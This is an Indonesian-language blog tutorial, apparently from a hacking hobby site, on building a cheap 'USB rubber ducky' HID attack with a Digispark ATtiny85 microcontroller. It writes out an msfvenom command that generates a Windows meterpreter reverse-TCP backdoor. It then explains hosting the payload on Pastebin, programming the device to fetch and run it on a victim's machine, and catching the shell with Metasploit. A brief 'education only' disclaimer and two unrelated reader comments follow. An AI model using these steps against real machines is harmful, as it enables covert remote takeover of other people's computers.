Selamat malam, kali ini gw mau share tentang HID Attack.
Semacam exploit bug usb gitu, kalo judul gw kan pake kata-kata "usb rubber ducky", tapi karena harga usb rubber ducky harganya mahal jadi kita akalin pake digispark mikrokontroler. Disini gw pake digispark attiny85 arduino, jadi jauh lebih murah ketimbang yang aslinya kwkwkwk
Lanjut, sebenernya banyak payload-payload yang dibuat hak5, kalian bisa liat disini.
ah disini yang gw pake itu payload Reverse Shell, oke simak aja tutor berikut ini
- Mikrokontroler (Digispark)
- Arduino Software
- OS Kali Linux
Tenang ini gw kasih tau caranya, pertama
Buat dulu script payloadnya dengan msfvenom, script ini yang nantinya akan di eksekusi oleh payload usb rubber ducky tersebut.
#msfvenom -p windows/meterpreter/reverse_tcp -f vbs --smallest LHOST=localip LPORT=portbebas -o Desktop/output.txt
Kita buka file output.txt yang ada pada desktop, copykan scriptnya ke pastebin dan create new paste. Sebenarnya yang kita butuhkan cuma linknya doang, karena nanti di script arduinonya kita set agar mendownload dan menjalankan backdoor yg kita buat dan upload tadi. Nah ini kayak contoh punya saya
https://pastebin.com/raw/DAS7jCJa
Jangan didownload gan itu local soalnya kwkwkwk..
Lanjut, kita buka arduino softwarenya dan copy paste code berikut
Nah itu code yang warna merah kalian ganti dengan link pastebin kalian. Inget, jangan colok dulu digisparknya dan pastikan driver digistump sudah diinstall.
Nah kalau semua sudah siap tinggal kalian klik tanda ceklist kemudian klik upload.
Ok kalau sudah terupload, biasa deh kalian aktifkan metasploitnya dan lanjut eksekusi, gw rasa dah pada faham semuanya deh
Tuh gw kasih juga tutorial videonya, kalau masih kurang faham silahkan bertanya pada kolom komentar wkwkwk
Btw ini hanya untuk edukasi saja yah, jangan yang macem-macem, resiko di tanggung sendriri ...
THX !!!
NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami
Background nya bikin mata mules.. coba di redupin dikit, sama jangan buru-buru nulisnya, biar bagus danenak di baca.
BalasHapusOke suwun lurd, maklum lah masih belajar
Hapus